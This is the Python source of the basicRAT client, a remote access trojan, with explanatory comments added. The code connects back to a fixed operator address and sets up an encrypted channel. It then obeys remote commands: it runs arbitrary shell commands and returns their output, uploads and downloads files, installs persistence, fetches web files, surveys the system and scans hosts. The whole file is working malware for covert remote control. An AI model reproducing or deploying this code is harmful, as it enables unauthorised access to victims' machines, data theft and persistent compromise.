#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# basicRAT client
# https://github.com/vesche/basicRAT
#
import socket
import subprocess
import struct
import sys
from core import common
from core import crypto
from core import filesock
from core import persistence
from core import scan
from core import survey
from core import toolkit
# Platform string handed to persistence.run() and survey.run() in main().
PLAT_TYPE = sys.platform
# Callback endpoint the client connects to in main(); fixed at build time,
# nothing in this file reads it from configuration or arguments.
HOST = 'localhost'
PORT = 1337
# Fallback key. Not referenced anywhere in this file — presumably consumed by
# core.crypto when the Diffie-Hellman exchange is unavailable; confirm there.
FB_KEY = '82e672ae054aa4de6f042c888111686a'
# generate your own key with...
# python -c "import binascii, os; print(binascii.hexlify(os.urandom(16)))"
def main():
    """Connect back to HOST:PORT and service operator commands until told to stop.

    What the code in this function does: open a TCP socket, run
    crypto.diffiehellman() to agree on a session key, wrap that key in
    crypto.AES_GCM, put the socket in non-blocking mode, then loop forever
    reading one message with crypto.recvGCM() and dispatching on its first
    space-separated word.  Results of most commands go back to the server with
    crypto.sendGCM().  The only clean exit is the 'kill' command; any socket or
    crypto error propagates and ends the process.  Everything after the first
    space in a message is passed to the handler verbatim — for 'execute' that
    text goes straight to a system shell.

    Side effects: outbound network connection, shell command execution, file
    reads/writes via core.filesock, and whatever core.persistence does.
    """
    s = socket.socket()
    s.connect((HOST, PORT))
    # Session key is negotiated on every start. The exchange itself, including
    # whether the peer is authenticated at all, lives in core.crypto — not
    # visible here.
    dh_key = crypto.diffiehellman(s)
    GCM = crypto.AES_GCM(dh_key)
    # Message counter passed to sendGCM()/recvfile(). It advances on every
    # recvGCM() return, including empty ones, because the increment comes
    # before the 'continue' below.
    IV = 0
    # Non-blocking socket: what recvGCM() returns when no data is pending is
    # defined in core.crypto; presumably an empty value, so the loop spins.
    s.setblocking(0)
    while True:
        #data = s.recv(1024)
        #data = crypto.AES_decrypt(data, dh_key)
        data = crypto.recvGCM(s, GCM)
        IV += 1
        if not data:
            continue
        # separate prompt into command and action
        cmd, _, action = data.partition(' ')
        # stop client
        if cmd == 'kill':
            s.close()
            sys.exit(0)
        # run command: the action text is executed through the system shell
        # (shell=True) and the combined stdout + stderr is sent back
        elif cmd == 'execute':
            results = subprocess.Popen(action, shell=True,
                                       stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                                       stdin=subprocess.PIPE)
            results = results.stdout.read() + results.stderr.read()
            crypto.sendGCM(s, GCM, IV, results)
        # send file: one transfer per whitespace-separated name in the action
        # (direction is per the helper's name; see core.filesock)
        elif cmd == 'download':
            for fname in action.split():
                fname = fname.strip()
                filesock.sendfile(s, GCM, fname)
        # receive file: written locally under the name given in the action
        # (direction is per the helper's name; see core.filesock)
        elif cmd == 'upload':
            for fname in action.split():
                fname = fname.strip()
                filesock.recvfile(s, GCM, IV, fname)
        # regenerate DH key: dh_key is rebound, but within this function the
        # GCM object built before the loop is not replaced
        elif cmd == 'rekey':
            dh_key = crypto.diffiehellman(s)
        # apply persistence mechanism (platform-specific, in core.persistence)
        elif cmd == 'persistence':
            results = persistence.run(PLAT_TYPE)
            crypto.sendGCM(s, GCM, IV, results)
            #s.send(crypto.AES_encrypt(results, dh_key))
        # download a file from the web; the action is passed as-is to the helper
        elif cmd == 'wget':
            results = toolkit.wget(action)
            crypto.sendGCM(s, GCM, IV, results)
            #s.send(crypto.AES_encrypt(results, dh_key))
        # unzip a file; the action is passed as-is to the helper
        elif cmd == 'unzip':
            results = toolkit.unzip(action)
            crypto.sendGCM(s, GCM, IV, results)
            #s.send(crypto.AES_encrypt(results, dh_key))
        # run system survey (platform-specific, in core.survey)
        elif cmd == 'survey':
            results = survey.run(PLAT_TYPE)
            crypto.sendGCM(s, GCM, IV, results)
            #s.send(crypto.AES_encrypt(results, dh_key))
        # run a scan against the single host named in the action
        elif cmd == 'scan':
            results = scan.single_host(action)
            crypto.sendGCM(s, GCM, IV, results)
            #s.send(crypto.AES_encrypt(results, dh_key))
        # any other command word is silently ignored and the loop continues
if __name__ == '__main__':
    # Script entry point; main() does not return normally — it exits via
    # sys.exit on 'kill' or by an exception propagating out of the loop.
    main()